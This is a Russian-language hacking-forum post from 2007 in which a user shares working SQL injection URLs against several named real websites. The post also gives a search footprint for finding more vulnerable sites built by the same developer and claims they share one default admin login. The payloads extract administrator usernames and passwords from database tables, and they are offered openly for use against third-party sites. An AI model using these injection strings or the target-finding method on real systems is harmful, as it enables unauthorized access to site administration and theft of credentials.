Показать сообщение отдельно

  #11  
Старый 01.12.2007, 02:33
Ded MustD!e
Members of Antichat - Level 5
Регистрация: 23.08.2007
Сообщений: 417
Провел на форуме:
14324684

Репутация: 3908
Lightbulb

http://www.marstonsdontcompromise.co.uk/ Сайт о пиве, особенно понравилось пиво с названием "Pedigree"

Код:
http://www.marstonsdontcompromise.co.uk/site/news_story.asp?news_id=1+or+1=(SELECT+TOP+1+cast(username+as+nvarchar)%2B%27%3A%27%2Bcast(password+as+nvarchar)+from+ashes_admin)--
Походу нашел уязвимость: ищем сайты с надписью "Site by EMAC2.SCREEN". Уязвимые скрипты - все где присутствует "id=" . В основном "xxx_list.asp?id=".
Exploit: 1+or+1=(SELECT+TOP+1+cast(login+as+nvarchar)%2B%27 %3A%27%2Bcast(password+as+n
varchar)+from+admins)--

Логи и пароль кстати тоже всегда одинаковые - guillaume : plop

Примеры:

http://www.chiefinspiration.com

Код:
http://www.chiefinspiration.com/index.asp?news_id=1+or+1=(SELECT+TOP+1+cast(login+as+nvarchar)%2B%27%3A%27%2Bcast(password+as+nvarchar)+from+admins)--
http://www.benoitoctave.com/

Код:
http://www.benoitoctave.com/books_list.asp?id=1+or+1=(SELECT+TOP+1+cast(login+as+nvarchar)%2B%27%3A%27%2Bcast(password+as+nvarchar)+from+admins)--
http://travel.youressentialmix.com

Код:
http://travel.youressentialmix.com/books_list.asp?id=1+or+1=(SELECT+TOP+1+cast(login+as+nvarchar)%2B%27%3A%27%2Bcast(password+as+nvarchar)+from+admins)--
http://tv.blogilvy.be/

Код:
http://tv.blogilvy.be/books_list.asp?id=1+or+1=(SELECT+TOP+1+cast(login+as+nvarchar)%2B%27%3A%27%2Bcast(password+as+nvarchar)+from+admins)--

Последний раз редактировалось Ded MustD!e; 01.12.2007 в 03:08..
 
Ответить с цитированием